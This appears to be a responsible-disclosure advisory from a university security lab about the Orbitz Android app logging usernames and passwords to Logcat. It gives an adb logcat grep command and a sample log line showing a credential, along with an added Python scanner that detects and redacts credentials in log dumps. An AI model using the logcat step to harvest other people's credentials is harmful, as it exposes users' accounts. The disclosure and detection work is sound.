Security Bug in Orbitz Android App
Sep 16th, 2019
- # Exploit Title: Orbitz Android App - Username/Password Logging
- # Application: Orbitz
- # Version: 19.31.1
- # Software Link: https://play.google.com/store/apps/details?id=com.orbitz
- # Company: Orbitz
- # Installs: 1,000,000+
- # Impact: An attacker who can read the Logcat output can obtain the user's Orbitz username and password
- # Category: Mobile Apps
- # Tested on: Android 9
- Usernames and passwords are written to the log during authentication, so an attacker can obtain a user's Orbitz password and ID simply by reading Logcat. In particular, on Android versions prior to Jelly Bean, any installed app could read Logcat without any permission.
- ---Vendor feedback---
- After the report, the vendor quickly fixed this problem and released a new version.
1. Log in with the Orbitz app, entering a username and password.
2. Search Logcat for "password":

    $ adb logcat | grep 'password'
    08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1
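As an added example (not part of the advisory and not Orbitz code): a pre-release check a mobile team can run over a saved `adb logcat -d` dump while exercising the sign-in flow. It goes beyond the `grep 'password'` step above in two ways: it flags only parameters that actually carry a value, so a UI string that merely mentions "password" is not a false positive, and it also inspects JSON bodies and URL query strings, not just form-encoded bodies. Values are redacted so a finding can be filed without copying the secret. The sample dump, tag names and the list of sensitive key fragments are constructed assumptions.

```python
"""Pre-release check: scan a saved logcat dump for credentials written to the log.

Added example, not code from the advisory. Intended input is the output of
`adb logcat -d > app.log` captured while exercising the app's sign-in flow.
"""
import re
from urllib.parse import parse_qsl

# Key-name fragments that mark a credential or account identifier (assumed list; extend per app).
SENSITIVE_FRAGMENTS = ("password", "passwd", "pwd", "secret", "token", "email", "username")
_FRAG_ALT = "|".join(SENSITIVE_FRAGMENTS)

# logcat "threadtime" layout:  MM-DD HH:MM:SS.mmm  PID  TID  LEVEL  TAG : MESSAGE
LOGCAT_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<level>[VDIWEF])\s+"
    r"(?P<tag>.*?)\s*:\s(?P<msg>.*)$"
)
# application/x-www-form-urlencoded run of key=value pairs ('&'-joined), also matches query strings
FORM_RE = re.compile(r"(?<![\w&])([\w.%-]+=[^&\s]*(?:&[\w.%-]+=[^&\s]*)*)")
# JSON string members: "key": "value"
JSON_RE = re.compile(r'"([^"]+)"\s*:\s*"([^"]*)"')
# The same two shapes restricted to sensitive keys, used for redaction
FORM_VALUE_RE = re.compile(rf"(?i)((?:^|[?&\s])[\w.%-]*(?:{_FRAG_ALT})[\w.%-]*=)[^&\s]*")
JSON_VALUE_RE = re.compile(rf'(?i)("[^"]*(?:{_FRAG_ALT})[^"]*"\s*:\s*")[^"]*(")')


def is_sensitive(key: str) -> bool:
    """True if a parameter name looks like it carries a credential or account identifier."""
    k = key.lower()
    return any(fragment in k for fragment in SENSITIVE_FRAGMENTS)


def sensitive_keys_in(msg: str) -> list:
    """Names of sensitive parameters that appear *with a value* in one log message."""
    found = []
    for form in FORM_RE.findall(msg):
        found += [k for k, _ in parse_qsl(form, keep_blank_values=True) if is_sensitive(k)]
    found += [k for k, _ in JSON_RE.findall(msg) if is_sensitive(k)]
    return found


def redact(text: str) -> str:
    """Replace the values of sensitive parameters so a finding can be filed without the secret."""
    text = FORM_VALUE_RE.sub(r"\1<redacted>", text)
    return JSON_VALUE_RE.sub(r"\1<redacted>\2", text)


def scan_logcat(dump: str) -> list:
    """Return one finding per log line that exposes a credential value.

    Unlike `grep password`, a line that merely mentions the word (a UI message,
    a method name) produces no finding: a parameter needs an actual value.
    """
    findings = []
    for raw in dump.splitlines():
        m = LOGCAT_RE.match(raw)
        msg = m.group("msg") if m else raw  # tolerate continuation lines without a header
        keys = sensitive_keys_in(msg)
        if keys:
            findings.append({
                "pid": m.group("pid") if m else None,
                "tag": m.group("tag") if m else None,
                "keys": keys,
                "line": redact(raw),
            })
    return findings


# Constructed sample dump in logcat threadtime format (not real app output).
SAMPLE_DUMP = """\
08-06 18:31:27.901  6213  6213 I ActivityManager: Displayed com.example.app/.SignInActivity
08-06 18:31:28.036  6213  6294 D OkHttp : email=alice%40example.com&password=hunter2&staySignedIn=true
08-06 18:31:28.040  6213  6294 D OkHttp : --> END POST (71-byte body)
08-06 18:31:28.102  6213  6213 D SignIn : password field validated, submitting
08-06 18:31:29.310  6213  6294 D OkHttp : {"session_token":"abc123","user":"alice"}
"""

if __name__ == "__main__":
    for f in scan_logcat(SAMPLE_DUMP):
        print(f"pid={f['pid']} tag={f['tag']} keys={f['keys']}\n  {f['line']}")
```

On the sample dump this reports two lines (the form-encoded sign-in body and the JSON response carrying a token) and ignores the "password field validated" message that a plain grep would have matched. Any finding with a tag such as `OkHttp` points at HTTP body logging left enabled in a release build, which is the class of defect this advisory describes.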
- Jaeho Lee(Jaeho.Lee@rice.edu)
- Rice Computer Security Lab
- Rice University